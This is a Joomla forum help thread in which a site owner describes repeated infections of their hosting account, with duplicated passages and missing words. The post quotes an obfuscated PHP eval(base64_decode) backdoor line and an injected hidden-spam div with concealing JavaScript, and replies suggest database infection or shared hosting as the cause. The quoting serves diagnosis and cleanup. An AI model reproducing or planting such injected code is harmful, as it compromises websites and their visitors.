Base 64 attacks - Joomla! Forum - community, help and support
hi everyone,
ive been struggling month now, , have not been able find vulnerability in hosting account, repeatedly being hacked base 64 code , hidden text code. on hosting account, have (7) joomla 2.5 installations , (6) joomla 1.5 installations. (yes know should upgrade 1.5 sites, , in process, need solved first.) i've cleaned code many times not funny, , when attacks happen hits entire account.
security actions taken far:
1. changed passwords hosting account, ftp, site admins, , mysql databases.
2. recursively changed permissions 755/644.
3. insured .htaccess each installation installed.
4. ran fpa on each site
5. double checked against vulnerable extensions list.
none of has stopped attacks.
here code snippets:
also finding on sites:
i need getting cleaned , locked down. occupying time , preventing me making money lol.
ive been struggling month now, , have not been able find vulnerability in hosting account, repeatedly being hacked base 64 code , hidden text code. on hosting account, have (7) joomla 2.5 installations , (6) joomla 1.5 installations. (yes know should upgrade 1.5 sites, , in process, need solved first.) i've cleaned code many times not funny, , when attacks happen hits entire account.
security actions taken far:
1. changed passwords hosting account, ftp, site admins, , mysql databases.
2. recursively changed permissions 755/644.
3. insured .htaccess each installation installed.
4. ran fpa on each site
5. double checked against vulnerable extensions list.
none of has stopped attacks.
here code snippets:
code: select all
eval(base64_decode("dqplcnjvcl9yzxbvcnrpbmcomck7dqokcwf6cgxtpwhlycmnoxd8oaq0kfq0kfq=="));also finding on sites:
code: select all
<div id='hideme'> <p>the pomegranate seed extract fruit has levitrapill.com/">what sildenafil citrate in</a> </div><script type='text/javascript'>if(document.getelementbyid('hideme') != null){document.getelementbyid('hideme').style.visibility = 'hidden';document.getelementbyid('hideme').style.display = 'none';}</script>i need getting cleaned , locked down. occupying time , preventing me making money lol.
the malware may in sql of these sites , not within files. it's possibly hosting shared , may problem not secure be.
if shared hosting check name servers, or ip range of site , see other sites hosted on it. see if of infected,.
if shared hosting check name servers, or ip range of site , see other sites hosted on it. see if of infected,.
Comments
Post a Comment